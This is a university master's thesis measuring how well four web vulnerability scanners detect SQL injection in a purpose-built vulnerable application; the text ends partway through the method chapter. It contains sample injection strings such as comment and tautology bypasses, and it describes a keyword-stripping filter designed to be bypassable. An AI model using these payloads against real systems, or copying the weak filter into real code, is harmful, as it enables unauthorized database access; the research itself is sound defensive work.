Measuring Accurancy of Vulnerability Scanners : An Evaluation with SQL Injections

(1)

Institutionen för systemteknik

Department of Electrical Engineering

Examensarbete

Measuring Accuracy of Vulnerablity Scanners

An Evaluation with SQL Injections

Examensarbete utfört i Datateknik

vid Tekniska högskolan vid Linköpings universitet av

Alexander Norström

LiTH-ISY-EX--14/4748--SE

Linköping 2014

Department of Electrical Engineering Linköpings tekniska högskola Linköpings universitet Linköpings universitet SE-581 83 Linköping, Sweden 581 83 Linköping

(2)

(3)

Measuring Accuracy of Vulnerablity Scanners

An Evaluation with SQL Injections

Examensarbete utfört i Datateknik

vid Tekniska högskolan vid Linköpings universitet

av

Alexander Norström

LiTH-ISY-EX--14/4748--SE

Handledare: Dr. Teodor Sommestad

FOI, Totalförsvarets forskningsinstitut, Linköping

Examinator: Jan-Åke Larsson

isy, Linköpings universitet

(4)

(5)

Avdelning, Institution Division, Department

Avdelningen för Informationskodning Department of Electrical Engineering SE-581 83 Linköping Datum Date 2014-03-14 Språk Language Svenska/Swedish Engelska/English Rapporttyp Report category Licentiatavhandling Examensarbete C-uppsats D-uppsats Övrig rapport

URL för elektronisk version

http://urn.kb.se/resolve?urn=urn:nbn:se:liu:diva-XXXXX

ISBN — ISRN

LiTH-ISY-EX--14/4748--SE Serietitel och serienummer Title of series, numbering

ISSN —

Titel Title

Mätning av noggrannhet bland sårbarhetsskannrar Measuring Accuracy of Vulnerablity Scanners

Författare Author

Alexander Norström

Sammanfattning Abstract

Web application vulnerabilities of critical are commonly found in web applications. The arguably most problematic class of web application vulnerabilities is SQL injections. SQL injection vulnerabilities can be used to execute commands on the database coupled to the web application, e.g., to extract the web application’s user and passwords data. Black box testing tools are often used (both by system owners and their adversaries) to discover vul-nerabilities in a running web application. Hence, how well they perform at discovering SQL injection vulnerabilities is of importance. This thesis describes an experiment assessing de-tection capability for different SQL injection vulnerabilities under different conditions. In the experiment the following is varied: SQL injection vulnerability (17 instances allowing tautologies, piggy-backed queries, and logically incorrect queries), scanners (four products), exploitability (three levels), input vector (POST/GET), and time investment (three levels). The number of vulnerabilities detected is largely determined by the choice of scanner (30% to 77%) and the input vector (71% or 38%). The interaction between the scanner and input vector is substantial since two scanners cannot handle the POST-vector at all. Substantial differences are also found between how well different SQL injection vulnerabilities are de-tected and the more exploitable variants are dede-tected more often, as expected. The impact of time spent with the scan interacts with the scanner - some scanners required considerable time to configure and other did not – and as a consequence the relationship between time investments to detection capabilities is non-trivial.

Nyckelord

(6)

(7)

Abstract

Web application vulnerabilities of critical are commonly found in web applica-tions. The arguably most problematic class of web application vulnerabilities is SQL injections. SQL injection vulnerabilities can be used to execute commands on the database coupled to the web application, e.g., to extract the web appli-cation’s user and passwords data. Black box testing tools are often used (both by system owners and their adversaries) to discover vulnerabilities in a running web application. Hence, how well they perform at discovering SQL injection vulnerabilities is of importance. This thesis describes an experiment assessing detection capability for different SQL injection vulnerabilities under different conditions. In the experiment the following is varied: SQL injection vulnerabil-ity (17 instances allowing tautologies, piggy-backed queries, and logically incor-rect queries), scanners (four products), exploitability (three levels), input vector (POST/GET), and time investment (three levels). The number of vulnerabilities detected is largely determined by the choice of scanner (30% to 77%) and the in-put vector (71% or 38%). The interaction between the scanner and inin-put vector is substantial since two scanners cannot handle the POST-vector at all. Substantial differences are also found between how well different SQL injection vulnerabil-ities are detected and the more exploitable variants are detected more often, as expected. The impact of time spent with the scan interacts with the scanner -some scanners required considerable time to configure and other did not – and as a consequence the relationship between time investments to detection capabil-ities is non-trivial.

(8)

(9)

1

Introduction

The web applications of tomorrow are all about data, collecting data from databases and processing it into new information for fun and profit. If attackers can get ac-cess to and influence this data, they can take the fun and profit for themselves. With the increasing popularity for the web as a platform for applications the threat posed against web applications need to be seriously considered. Accord-ing to OWASP, a worldwide organization focused on improvAccord-ing the security of software, the biggest threat against web application are injection attacks, such as SQL (Structured Query Language) injections and cross-site scripting OWASP [2013]. Verizon states that web application is a popular target in larger organi-zations, 56% of all recorded breaches was against a web application and they account for 39% of the compromised records Verizon [2012]. As such the overall security of web applications is considered poor. SQL injection attacks is by far the most common and dangerous vulnerability in web applications. OWASP pub-lishes a top 10 list of vulnerabilities every third year. In the top 10 report from 2007 SQL injection attacks scored a second place, but in the two following reports for 2010 and 2013 injection vulnerablities is now ranked first OWASP [2013]. In addition SQL injections are also the higest ranked category in the SANS institute list of the 25 most dangerous software errors Martin et al. [2011].

Fortunately, there are tools available that can be used to detect these vulnerabili-ties before they are exploited by an adversary. A vulnerability scanner can detect major problems, which in turn can be mitigated by the security team. However, these vulnerability scanners are not omniscient. Thus we need to know more about what these tools can and what they cannot do, in order to make some as-sumption on what we can use them for and to what extent they can be trusted. Studies of web application vulnerability scanners have shown that there is quite

(12)

a difference in the results between scanners. It has also been shown that scanners produce a large percentage of false positives and that they leave many vulnerabil-ities undetected Bau et al. [2010] Doupé et al. [2010] Fonseca et al. [2007]. These previous studies have looked at several types of vulnerabilities in web applica-tions, such as: Cross-Site Scripting, Cross-Channel Scripting, Cross-Site Request Forgery, SQL Injections and Malware Presence. In this thesis we will focus on SQL injection because they represent the most common and dangerous vulner-abilities found in web applications and because these weaknesses in software system are easily and often exploited by attackers. In addition, SQL injection vulnerabilities have a low remediation cost and detection of them is quite easy, making vulnerability scanners an interesting defensive tool Martin et al. [2011]. This thesis describes an experiment in which a web application was constructed with a known set of vulnerabilities, and where the vulnerabilities were verified in advance. We chose to construct a new application to perform test against instead of using and existing to have better control over the constraints and vulnerabil-ities it included. The application was then used to perform a set of controlled experiments where different vulnerability scanners were tested against the ap-plication. The scanners are then evaluated based on which vulnerabilities they detected. The vulnerabilities present in the web application were chosen to repre-sent a wide range of different conditions that could be prerepre-sent in real web appli-cations. The result of these experiments will show how the detection capabilities depends on these conditions and the scanner in use.

1.1 Purpose

The purpose with this thesis is to describe the current state of web vulnerability scanners when it comes to detecting SQL injections in web applications. Accord-ingly, our research question is to know to what extent we can rely on vulnerability scanners to discover and mitigate these vulnerabilities in our web applications under different conditions. The scope is limited to scanners that can be used without access to the source code of the application. This scanners are of par-ticular interest as they report the same result for both the product owners and adversaries.

1.2 Outline

The second chapter introduces concepts and background facts about SQL injec-tions and vulnerability scanners. It establishes the taxonomy used later to define the experiment in the third chapter. The method used and definition of the ex-periment is described in third chapter. The forth chapter follows with the results obtained from the experiment. It presents the results from individually studying each of the independent variables that was varied during the experiment. Fol-lowing that is an analysis of the interactions between the variables and a general discussion about the results is presented in the fifth chapter. The last chapter

(13)

1.2 Outline 3

then concludes and presents the important finding in this thesis. The rest is Ap-pendixes containing data tables and references used in the thesis.

(14)

(15)

2

SQL Injections and

Vulnerability Scanners

In this chapter we give some background into the field of SQL Injections and Vulnerability Scanners. We also introduces the classification taxonomies which are used throughtout the thesis.

2.1 Different types of web attacks

This section covers how different types of web attacks can be classified based on their attack life cycle. The taxonomy by Álvarez and Petrović [2003] defines the life cycle for a web attack in a structured and logical way. A taxonomy is a classi-fication scheme that partitions a body of knowledge and defines the relationship between the parts Howard and Longstaff [1998]. The suggested life cycle is split into nine categories:

1. Entry point: The targeted application system. Our target is the web appli-cation itself.

2. Vulnerability: The weakness in the system that allows unauthorized ac-tions. They define 5 types: Code injection, Canonicalization, HTML ma-nipulation, Overflows and Misconfigurations. We are only interested in the subset of Code injection namely SQL injections.

3. Service (under threat): What type of security service the attack poses a threat against. This classification is of no interest to us.

4. Action: What vulnerability type the attack exploits.

5. Length: Number of arguments passed in the request. Can be Expected or Unexpected. Used to trigger buffer overflows and are therefore of no

(16)

interest to us.

6. HTTP element: The user input fields used to perform the attack.

7. Target: The aim of the Attack. Can be either the web application or the platform. Only web applications is of interest where application data and functionality will be affected.

8. Scope: Whom the attack affects, such as a single user or a group of users. Can be either local (impact limited to single or small group of users) or uni-versal (All users are affected, e.g. database manipulation). Our experiment will focus on Universal attacks.

9. Privileges: If the attack escalates privileges. Only applicable if the targeted service is Authentication which was of no interest therefore neither is this. This taxonomy describes SQL injections from an environmental viewpoint, but do not give a clear classification of the technical aspects involved by the SQL in-jection. However, it does still provide useful context on the overall vulnerability. It can be used to describe the attack vectors that are used by the attacker to reach his goal. To do this they refer to the concept of an attack life cycle, where life cy-cle is defined as the chain of events that the attack incurs when passing through the web stack of the application. These nine steps of the life cycle represent the order of commands the attacker has to complete. First, it has to pass the entry point to the application. The entry point would contain a vulnerability, which in turn would threaten a service. By exploiting an action in that service performed by the application using some input vector that is transmitted by the web stack to a target within the scope of the application, gaining some unintended privileges.

2.2 SQL injections

SQL (Structured Query Language) is a special-purpose programming language used to query relational database management systems (DBMS) for data. The language is based upon relational algebra and consists of operations for data def-inition and manipulation. It includes operations for data creation, reading, up-dating, and deletion. Vendors that use SQL typically extend the language with additional functionality that includes, but are not limited to, schema and access control management. Furthermore, vendors often add procedural elements that make it possible to create programs within the DBMS itself.

SQL injection is an attack in which malicious code is inserted into a string that are later passed as a query to the DBMS for parsing and execution. The attack is performed by including additional input that is crafted to resemble SQL state-ments into the entry fields of the web application. If there is a SQL injection vulnerability this input is then processed by the web application in an unsecure manner and the crafted input is assembled with the real SQL query to change the behavior of the web application. As an example of a SQL injection, let’s consider the following SQL statement (\ denotes the line continues without linefeed):

(17)

2.2 SQL injections 7

SELECT * FROM users \

WHERE username = ’Alice’ AND password=’secret’

This SQL statement tries to fetch a row from the DBMS where the username equals Alice and her password is secret. Let’s say that if, both these fields are true the DBMS will return the user record for Alice and allow Alice to log on to the web application. If the attacker can provide the value for the username and password parameter in the example via a login page (i.e., change Alice and secret to something else) he would be able to inject his own code into the statement. For instance, the attacker can craft parameters that modify the statement to always return a match for the user Alice. He performs this attack by injecting database escape code into either the username or password parameter. As example, insert a username or password that abruptly ends the SQL statement by marking it as a programmer’s comment. If the attacker would enter the username Alice’ --the two dashes remove everything to --the end of --the line and --the statement sent to the database would be the following:

WHERE username=’Alice’ -- AND password=’clueless’

This statement would return any record where the username is Alice, as the dou-ble dash (--) in the statement marks the rest of the row as a comment (i.e. some-thing that is not to be executed).

Another way the attacker can bypass the check for both fields is to add an addi-tional criteria which would always evaluate to true. This is called a Tautology and will be explained in detail later. Such a statement could be constructed by escaping the password parameter with a single quote (i.e. ’) followed by a true statement (e.g. clueless’ OR ’1’=’1). The attacker would then modify the statement to something like this:

WHERE username=’Alice’ AND password=’clueless’ OR ’1’=’1’

The statement above would always evaluate to true because the condition for 1=1 will be used whenever the first conditions does not hold.

Halfond et al. [2006] proposed a taxonomy for the classification of technical as-pects involved in SQL injections. This taxonomy is described below. Alterna-tive classification schemes can be found in Álvarez and Petrović [2003] Fong and Okun [2007] Shin and Williams [2008].

2.2.1 Tautologies

The goal with these attacks is to inject code into the conditional statements of the SQL query to modify their behavior to always evaluate to either true or false in every possible interpretation. Another name for this attack is Boolean-based attack. The intent behind this type of attack varies, but usually they are used to bypass authentication or to extract data from within the system Halfond et al. [2006].

(18)

The injections are triggered by injecting invalid input into the conditional fields in the WHERE section of a query, but also be combined with input from other sec-tions of the query such as the GROUP BY or ORDER BY secsec-tions. To successfully exploit the system, the injected input has to change the conditional statement of the WHERE-clause to always evaluate to the same result. In other words, the DBMS will interpret the query as either true or false regardless if the provided parameters (like username and password) matches the content of the database or not.

2.2.2 Incorrect Queries

An attacker can try to inject invalid statements into the query so that the database system will disclose information about the underlying database schema and queries. An attack of this sort can be used by the attacker to gather information about the database system for further attacks.

The attacker can extract information from the database system with these incor-rect queries by observing the behavior of the application when executing them. If the application is not configured to handle errors in quiet way they can return a default error messages when an incorrect query is executed. The error message returned from the system is often so descriptive that the attacker can easily lever-age information about injectable parameters in the query so that new exploits can be crafted to utilize these vulnerabilities and fulfill the attacker’s intent.

2.2.3 Piggy-Backed Queries

In some systems the database abstraction layer supports the evaluation of multi-ple SQL queries in each call. By supporting this functionality the developer can invoke several queries at the same time. However, it may also allow an attacker to append entirely different queries that the developer did not intend.

In this attack the goal is not to modify the query into performing something dif-ferent. Instead the attacker modifies the query by inserting additional queries using what is called a Query Delimiter. Therefore allowing the attacker to per-form other queries then what is possible with for example tautologies. In the end the database will execute all queries as normal, including the attackers new queries, and therefore it is possible to perform queries that are not usually possi-ble by modifying existing queries. This attack can be very harmful as it allows the attacker to issue any type of query that the current database user has access to ex-ecute, such as creating new administration accounts, invoking system commands, or installing backdoors in the database server.

2.2.4 Union Queries

This type of attacks is used to extract data from the database by exploiting a pa-rameter to change the resulting data set from the database. The attacker changes the result by injection a UNION SELECT statement into the existing one. Doing so the attacker append data from other tables and system variables onto the orig-inal data set the database would return. Examples include extracting account

(19)

2.2 SQL injections 9

details such as password or credit card numbers.

2.2.5 Stored Procedures

Some types of database management systems allow for the creation and usage of stored procedures within a database. A stored procedure is a user defined func-tion that has the power to execute statements on behalf of another user. This makes Stored Procedures useful to implement specialized access control. Let’s make an example with a booking system, assume the anonymous user may not read or write to the reservation table. In this case the anonymous user can call a stored procedure that is executed as the receptionist user, which has write access, to make a new reservation. However if the stored procedure would be improperly implemented the anonymous user could escalate his privileges to get the recep-tionist access. An example of such a bad implementation is to concatenate SQL statements and evaluate them inside the stored procedure. The recommended practice is to bind data to variables and use these variables in queries instead. If the stored procedure evaluates SQL statements from strings, an attacker could execute any type of SQL statements in the database. A neat feature of stored procedures is that they can also be used as triggers on database event, such as INSERT INTO, UPDATE, and DELETE on tables. If the attack were to create such a trigger, he could insert a backdoor into the database, and possible collect input data before it’s stored to disk. The attacker can then intercept and collect for ex-ample plaintext password and other secret data before it is encrypted and stored to disk.

2.2.6 Inference

This attack classification is used by an attacker to discover vulnerable parameters, database schemas, or to extract data. The attack is performed by modifying the SQL statements to perform a specific action only if the condition evaluates to true or false. Even if the attacker cannot extract information directly from the database the attacker can use Inference to conclude what the actual data might be, by injecting statements that would trigger some response depending on the value of the actual data. Inference is therefore a useful tool when attacking applications that are configured to not respond with error codes or other messages to signal if an attack was successful or not. In comparison with the Incorrect query attack. Two types of Inference are Blind Injection and Timing Attacks. With a Blind In-jection it’s possible to deduce if the injected statement was successful based on the response from the server when asking true/false questions. Even if the server does not response with error, the outcome can be inferred by the fact that the response from a site will contain slight different output for a normally function-ing page versus a page that is expected to be broken. If, for some reason, the responses would not differ between a functional and a broken page, a time based attack can be used instead. Timing Attacks uses a similar approach as Blind Injec-tion Attacks but instead of deducing informaInjec-tion from the true/false responses given by the web application, time consuming queries are given to the web ap-plication. By measuring the response time needed by the web application to

(20)

process the response it is possible to deduce if the attack were successful against the database or not.

2.2.7 Alternate Encodings

Sometimes the application may be developed with defensive coding practices or use other prevention techniques to protect against SQL injections. One technique is to simply reject certain input patterns from the user. An attacker can circum-vent this protection schemes by encoding his input in a way avoids detection by these defensive mechanisms. The attacker can to use the same range of Attacks as discussed earlier but he must encode them to syntactically change the format to avoid detection while keeping the same semantics the same. Therefore Alter-native Encoding cannot be considered a separate attack. It rather is used as an evasion technique in conjunction with another attack. Alternative Encoding is still very useful and often needed as defensive coding practices often include to scan input for certain bad characters to sanitize the input data.

2.3 Scope of this study

The taxonomies presented in this chapter are not fully compatible with the needs we have in the experiment. To handle this we have chosen the most important different parts we need for the experiment from theses taxonomies. In relation to the life cycle model presented above we’re going to treat those categories as follows in this thesis:

1. Entry point: Only the web application is targeted. 2. Vulnerability: Only SQL injections are targeted. 3. Service (under threat): Don’t care.

4. Action: Don’t care. 5. Length: Don’t care.

6. HTTP element: Used to describe the user input needed to trigger the vul-nerability in our experiment.

7. Target: Only the web application is targeted.

8. Scope: We assume Universal scope for the experiment. 9. Privileges: Don’t care.

The step in the life cycle is complemented with the taxonomy for SQL injection attacks presented in sections 2.2.1-2.2.7. We consider SQL injection attacks based on Tautologies, Incorrect Queries, Piggy-Backed Queries, and Union Queries. In summary, this thesis has the following scope.

(21)

2.4 Variables influencing vulnerability scanning effectiveness 11

Entry point Web application Vulnerability Tautologies

Incorrect Queries Piggy-backed Queries Union Queries

HTTP elements GET/POST/Query parameters. Target Web application

Scope Universal impact

2.4 Variables influencing vulnerability scanning

effectiveness

A web vulnerability scanner is a tool to automatically examine web applications for security faults Fong and Okun [2007]. The tool can either search for appli-cation specific vulnerabilities using fingerprinting of the system component and compare the result against a vulnerability database or try the more aggressive method with probing the application for design and coding errors such as illegal input and buffer overflows.

These tools can perform a number of steps when analyzing web applications. The vulnerability scanner maps the structure of a web application by crawling through its web pages and examining each page for input sources, links, and other relations. When the structure of the application has been explored the scan-ner will start a penetration test against the input vectors discovered during the exploration face. A penetration test is an active analysis of the web application that injects carefully crafted input into the various input sources that was discov-ered. The applications will interpret the input and produce output accordingly. The vulnerability scanner will observe the output of the application during these injections and deduce information about potential vulnerabilities based on the applications response. This makes a vulnerability scanner useful for purposes such as searching, identifying and mitigating vulnerabilities in new and existing applications. In the following sections factors believed to influence their detec-tion capabilities are described.

2.4.1 Actions covered

Web application may contain several different actions that can be performed. The taxonomy from section 2.1 introduces the following Action types: Read, Mod-ify, Delete, Fabricate, Impersonate, Bypass, Search, Interrupt, Probe, and Other for

all those types that do not fall under the first nine classes Álvarez and Petrović [2003]. If a scanner should be able to detecting vulnerabilities in web

(22)

applica-tions they would need to have least one scanning method that can detect each of these cases.

2.4.2 Time, experience, and tuning of scanners

It is generally assumed that the operator’s previous experience and time invested in using a particular scanner will yield better scanning results Acunetix [2012] . An experienced operator should outperform an inexperienced operator when given the same task and the same tool.

2.4.3 Protections techniques used by the application

If the application use some protection technique to mitigate an attack against the application this may influence the scanner’s effectiveness. For example, an application can be implemented with filters that will prevent or treat certain key-words in the input parameters differently from expected input. There are two issues with this. First the scanner will not be able to detect application logic that depends on a keywords defined in the application to be triggered, as the scanner could possible not know these keywords unless the source of the application was analyzed before the scan. The other problem is that while the application now can protect itself from some injection attacks, it can still be vulnerable to other attacks since it would be impractical to predict every possible input that could trigger a vulnerability in the entire system. Therefore we assume that the “ex-ploitability” (difficulty) to trigger a vulnerability in the application is related to the scanners ability to test for and analyze how input is handled by the applica-tion.

2.4.4 Scanner/Scan-method

The method and techniques used by the scanner to probe the application is ex-pected to be of some importance. The different methods include white-box test-ing which can utilize static analysis methods such as Context free grammars, use of secure coding practices, lexical analysis, data-flow analysis. taint analy-sis, white box testing with static analysis(e.g. Pixy Jovanovic et al. [2006]), and black-box testing (e.g. SecuBat Kals et al. [2006]) where the scanners searches for vulnerabilities by mapping the application and comparing response against a signature database by either using know attacks or probing unexpected behavior with different techniques (e.g. fuzzing) Huang et al. [2004].

2.4.5 Scan barriers

Web application may have application specific barriers that can be confusing and hard for the scanner to understand. Scan barriers are not a protection technique for the system, it is application logic that normal users can and will handle with ease, but could require extra supervision when used with a scanner. For example, typical scan barriers include requirements for the users to authenticate with the application before use, or answering challenges when submitting data.

(23)

2.5 Previous studies of web and SQL vulnerability scanning 13

2.4.6 Input vector

The scanner has to support the attack vectors that are required to trigger vulner-abilities in the application. This can be support for different input methods in the application like the HTTP verbs presented in the taxonomy but also less used HTTPverbs such as PUT, and DELETE. At the same time it can also be required to craft and analyze header responses from the server. All these different input vectors change the attack vector the scanner has to use to trigger the vulnerability in the system. Changing the attack vector would require the scanner to perform the scan with other input variables using a different input source. The input vari-ables are sent and received at the endpoint of the web application. Depending on the scanners choice of data submission the application will perform different tasks.

2.4.7 Database management system

The DBMS that are used in the system could influence the result of detected vul-nerabilities by the scanners when test against specific vendors are conducted. For example, the language used when talking to a DBMS is SQL, and standardized portion of SQL as language is very limited in its capabilities. Therefore differ-ent vendors have extended SQL with own functionality that is specific to their product. This functionality, and scanners way of handling it, may influence the detection capabilities.

2.5 Previous studies of web and SQL vulnerability

scanning

Bau et al. [2010] evaluated eight black-box scanners’ effectiveness in detecting vulnerabilities. They found that scanners, in general, are adapted to detecting straightforward historical vulnerabilities which have been found in popular ap-plications or textbooks. In addition they found that black-box scanners show room for improvement in other cases such as advanced and second-order forms of SQL injections. They highlight that low detection rates for the advanced types of SQL injections may be due to more systematic flaws in the scanners themselves and discussed a few ways that scanners could be improved for these vulnerability types, such as novel and non-standard keywords. They also reason about the low coverage results and false positives, have to do with active content and scripting languages on the site such as Silverlight, flash, java applets, and JavaScript. A previous study by Fonseca et al. [2007] found that scanners vary in their result and they recommended using several scanners when searching for vulnerabilities in a web application. The study also finds that the best vulnerability scanner for SQL injection was not the best vulnerability scanner for Cross-site scripting and vice versa. Furthermore, they concluded that there was a high rate of false positives in their experiment while at the same time saying that the scanners failed to detect several vulnerabilities while not presenting any results on what

(24)

these vulnerabilities are.

Several other studies have focused on benchmarking different vulnerability scan-ners to compare their effectiveness, see Bau et al. [2010], Halfond and Orso [2006], Shin and Williams [2008], Elia et al. [2010]. One issue with some of these bench-marks, is that they don’t go into any details regarding the vulnerability types that are used in the tests or the detection rate for them. For example, the study per-formed by Bau et al. [2010] shows that the average vulnerability detection rate for SQL injections were 21.4% and relates that result to other vulnerability cate-gories (Malware, Information leakage, configuration error, session management SQL injections, CSRF, XCS, XSS). Thus, it is largely unknown how different fac-tors influence the detection rate you get when you search SQL injections.

The tools used to test for vulnerabilities are new and are immature Curphey and Arawo [2006]. The experiment presented in this thesis provides more recent data on the effectiveness of vulnerability scanners and address some of the issues not handled in the tests described above. For example, the experiment investigates different types of SQL injection vulnerabilities. This experiment will focus on as-sessing the detection capabilities of vulnerability scanners when tested against a custom-build web application. In this setup we’re able to vary the vulnerabilities, scanners, difficulty of exploitation, input vectors, and time investment used for each test.

(25)

3

Method

To answer the research question presented in section 1.1, a series of experiments was performed. The focus of these experiments was to evaluate how good black box web vulnerability scanners are on detecting different types of SQL injections in web applications.

3.1 Experimental design

The most effective way to test vulnerability scanners is to run them against appli-cations that we already have analyzed Curphey and Arawo [2006]. By doing so we both test that the vulnerability scanner have the capacity to detect vulnerabili-ties in the application, we can make a direct comparison between the given result by the scanner against the expected result which is known in advance. In this experiment these scans are performed against a custom-built web application in which we have carefully chosen and validated the presence of all vulnerabilities so that they actually are exploitable.

The dependent variable which will be measured is the number of correct alarms about detected vulnerabilities in the web application. The experiment will fol-low a univariate analysis procedure. Basically only the change in detection rate is observed when one of the independent variables is changed while keeping the other constant. The tests are repeated several times with different values for each of the independent variables every time. In this experiment the dependent vari-able is the number of correct alarms produced and the independent varivari-ables are: SQL injection vulnerability, input vector, difficulty of exploitation and scanner Keppel and Wickens [1973].

There are a number of nuisance variables that could influence the results but

(26)

Table 3.1:Experiment variables Variable Type Treatment

Detection rate Dependent Measured by comparing reports to known vulnerabilities.

SQL Injection vulnerabilities

Qualitative independent

Exhaustive list: piggy-backed queries, tau-tologies, alternative encoding and logi-cally incorrect queries.

Input vector Qualitative independent

Alternate HTTP verbs: GET, POST

Difficulty of Exploitation

Qualitative independent

Three levels: Easy, Medium, Hard

Scanner Qualitative independent

Selected alternatives: w3af, IBM AppScan, Netsparker, and Acunetix

Time investment Nuisance The scanner is prepared according to its manual. The time required is noted. Experience Nuisance The order of scanners usage are randomly

selected for each vulnerability DBMS Nuisance Kept constant (MySQL)

Scan Barriers Nuisance Kept constant (no barriers in test)

which are of no particular interest for this experiment. In other words, this ex-periment will not assess how they influence the number of correct alarms about found vulnerabilities. The known nuisance variables (experience, DBMS, barri-ers, exploited action, time investment) are treated by either repeatedly assigning a random value to them value or keeping them constant during the experiment. For example, we make the assumption that the user of the tools will be the devel-opment team itself – we assume the user in this case can configure the tools to scan accordingly to the underlying implementation details of the tested system. All relevant variables and treatment in the experiments are summarized in ta-ble 3.1.

3.2 Dependent variables

The experiments measure one or more dependent variables responds to the changes in the other (independent) variable. In this experiment we expect the dependent variable to pass from one form to another when we make changes to the indepen-dent variables. In our particular case the depenindepen-dent variable is the number of

(27)

cor-3.3 Independent variables 17

rect alarms that the scanners has detected during their scans, i.e. the detection rate. This can be measured directly by comparing the reported vulnerabilities with the list of known vulnerabilities in the test bench.

3.3 Independent variables

The independent variables describes variables of interest for the experiment which are assumed to have influence on the dependent variable. The independent vari-ables in this experiment are: SQL injection vulnerability, Input vector, Difficulty of Exploitation, and Scanner. The first three are related to the system being scanned and the other two are related to the scanning procedure. How they are treated is described in the following sections. In an experiment the independent variables needs to be controlled and varied. How this is done is described below.

3.3.1 SQL Injection Vulnerabilities

To better understand and distinguish between different SQL injection types we need a system for classifying the different SQL injections we are describing. The types of vulnerabilities to include in the tests are chosen according to the selected taxonomy which is based on the attackers Intent, the Input Source, and the Tech-nical Aspect of the attack itself Sun et al. [2007].

In the experiment we can influence the vulnerabilities that are tested by the scan-ners. The chosen vulnerabilities are implemented as test cases in the experiment. The vulnerability scanners will try to exploit these test cases in order to trigger vulnerabilities in the application. All vulnerabilities in the experiment were com-plemented with tests containing working exploits that automatically could verify the presence for each of vulnerabilities in the system. These tests therefore de-fine the baseline for positive vulnerabilities in the application when evaluating the scanners. The vulnerabilities are chosen to require the scanners to performed SQL injections by exploiting the application with the following SQL injection classes:

Vulnerability type Description

Piggy-Backed Queries See section 2.1.3.3 Tautologies See section 2.1.3.1 Alternate Encoding See section 2.1.3.7 Illegal/Logically Incorrect Queries See section 2.1.3.2

In addition to these for SQL injections classes the vulnerabilities are chosen to represent different functional goals and to have different injectable data types (Text, number and date fields). For complete classification of all vulnerability cases, see Table B.2.

(28)

3.3.2 Input vector

The scanner has to probe an input source to reach the vulnerable part of the application. The input vectors can be varied according to: injections through user input, cookies, server variables, or second-order injection (injecting data into the application that are used in an insecure manner at a later execution stage). The input vectors can be controlled as a qualitative independent variable where we can vary how the exploit should be sent to reach the vulnerability. The variable is limited to only GET and POST verbs. This limitation come from the fact that data submission using cookies and second-order injections will add complexity to the application, thus adding a scan barrier to the application. Additionally, server variables can only be changed by reconfiguring the web server and such tasks are out of the scope of the experiment. Only testing GET and POST verbs is still reasonable, together they represent the most common way to submit user input from forms and links to a web application.

Input type Description

GET The GET method is used to retrieve information from a specified URL. The GET method should not have side ef-fects that can alter the state of the application. Therefore we should not be required to roll back the application state for each test. The GET method accepts user input in the form of a query string (URLs which contains a “?”).

POST The POST method is used to submit data to the application. The origin server should perform the action requested by the POST method and redirect the client to the appropriate result.

3.3.3 Difficulty of Exploitation

The exploitability (i.e. the difficulty of triggering a vulnerably with an exploit) can be introducing a layer of protection mechanisms in the application. We can expect that the number of detected vulnerabilities is dependent on how easily the application can be exploited. By adding increased protections to the vulnerabili-ties we see how the scanner responds to increased difficulty and limitations. When sanitization is used the following rules apply. The input is sanitized by escaping special characters (e.g. apostrophes). Characters used for comment are removed from the input. This included the character / (forward slash) and * (as-terisk). A sequence of - (dashes) are replace into a single - to protect against the line comment -- (double dash). We also remove SQL keywords from the input. Keywords include EXEC, EXECUTE, SELECT, INSERT, UPDATE, DELETE, UNION, JOIN, CREATE, ALTER, DROP, RENAME, TRUNCATE, BACKUP, and RESTORE. Lim-iting the use of these keywords should protect the system from the most common formats of SQL Injections. This would require the scanner to perform some sort of alternative coding or fuzzing techniques that would circumvent the protection

(29)

3.4 Nuisance variables 19

mechanism. The protection mechanism is designed to be sufficient but not totally secure. Therefore allowing a specially crafted input to bypass the security check and still trigger the vulnerability.

The tests are classified in three different levels, in an ascending order where Hard is the most difficult to exploit:

Difficulty class Description

Easy Easy difficulty means that the system does not have any ad-ditional security constraints.

Medium The medium level introduces input sanitizing in the system as described above.

Hard In addition to the input sanitization introduced by the medium difficulty, the hard difficulty also applies pattern matching to the input making which will require consider-able effort from the attacker to pass SQL statements into the system without alternating the encoding first.

3.3.4 Scanner

The scanners themselves should also be considers as a variable. This makes them a qualitative independent variable. The reason behind this is that there are a lot of factors that are associated with scanners. Such as: usability, scanning method and techniques, vulnerability signatures, and so on. As these factors cannot be tested independently due to issues of isolating and separating them, the entire scanner is treated as an independent single entity. A reasonable assumption is therefore that the scanners will differ in their capabilities and scanning tech-niques. These extra facts could give a particular scanner an advantage against the other scanners.

These scanners chosen for evaluation in this experiment are: w3af, IBM App-Scan, Netsparker, Acunetix. This list of scanners may seems small, putting w3af aside these three are the only commercial scanners that we had available at full versions when the test was performed.

3.4 Nuisance variables

There are factors that influence the value of the dependent variables other than those we are interested in. These factors are called nuisance variables and could cause variation in the outcome of the experiments Keppel and Wickens [1973].

3.4.1 Experience and time investment

As previously stated the results are depending on the previous experience an op-erator has in the scanning field. If the opop-erators have good previous knowledge

(30)

of how vulnerability scanners work he can probably scan the application better than someone how doesn’t have that prior experience. To handle this issue the order of scanners to use at is chosen at random and the vulnerabilities is divided into smaller sets and then these individually subsets is also scanned at random. These steps are repeated until all combinations have been tested and then the re-sults are finalized. By selecting the order of scanners at random, it’s assumed the operator will have roughly the same prior experience regardless of which scan-ner he operates. By also choosing the set of vulscan-nerabilities to scan at random any specialized experience the operator can gain with a particular kind of vulnera-bilities will be rendered useless for the next. This procedure was repeated until all scanners have been tested against all vulnerability sets, with equal amount of time investment.

It is possible to improve the result of a scanner by investing more time into tuning the scanner to the scanned system and provide customized instructions to it. The strategy for controlling this variable is to configure all scanners in accordance to their manual, even if it takes a lot of time. Although the time requirement was considered a nuisance variable it was still recorded and is considered a reported as a side result of the study.

3.4.2 Choice of Database management system

This variable is kept constant by using MySQL as DBMS in all tests.

3.4.3 Scan Barriers

The purpose of this experiment is not to test the scope of functionality for a set of scanners but instead to test the ability to detect certain types of vulnerabilities. Therefore scan barriers will not be tested as this would only contribute to addi-tional configuration of the tools on how to interact with the web application. The influence of Scan barriers will therefore not be addressed in this experiment. The variable is kept constant during the experiment in such sense that all possible barriers will be removed from the application. In other words, no authentication, logic or proxies are to be present between the scanner and the vulnerabilities.

3.4.4 Exploited Action

